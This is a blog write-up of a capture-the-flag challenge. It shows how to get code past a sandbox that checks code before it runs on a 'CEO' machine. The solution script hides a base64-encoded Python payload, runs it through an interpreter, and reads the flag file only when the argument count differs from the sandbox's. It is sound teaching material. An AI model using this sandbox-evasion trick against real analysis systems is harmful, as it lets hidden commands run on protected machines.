Reverse engineering, Windows internals, x86 magic, low level programming, and everything else I feel like writing about.

CrySyS SecChallenge 2020: 2scripts1hash - 2

Our brand new PaaS is finally open to the public. Unfortunately we don’t have the necessary physical infrastructure to provide big amounts of compute power, but we didn’t want to miss out on such a great market, so we found a way. Instead of going for quantity, we went for quality: you will have a chance to run your code on the computer of our CEO. Just imagine the premium feel, the honor of executing code on the machine of such a powerful and accomplished man! There will surely be many people who want to experience something like that, I’m sure the service will be very successful.

Of course, there are many important and sensitive documents on the computer of our CEO, so we can’t just let you run code unchecked. Luckily, we have a cutting edge dynamic analysis framework, so if you send it there, we can verify that it doesn’t do anything nefarious, so you can send it to the CEO and we can verify that its the same program by comparing md5 hashes.

Version 2: we received some complaints that we modify the uploaded code, and it destroys the premium quality of the service. So we changed up our process a bit, have fun with it!

Categories

Offensive, Cryptography

Files

Solution

The challenge has the same oversight as the first one. However this time our script is interpreted line-by-line. A simple trick of base64-ing our code and executing it the same way as they did in the first challenge will do the trick:

import code
from base64 import b64decode as bdec

inter = code.InteractiveInterpreter()
inter.runcode(bdec("aW1wb3J0IHN5cwppbXBvcnQgb3MKaWYgbGVuKHN5cy5hcmd2KSAhPSAzOgogICAgb3Muc3lzdGVtKCJjYXQgZmxhZyIp"))
print('Hello World!!')

Output:

cd20{REDACTED}
Hello World!!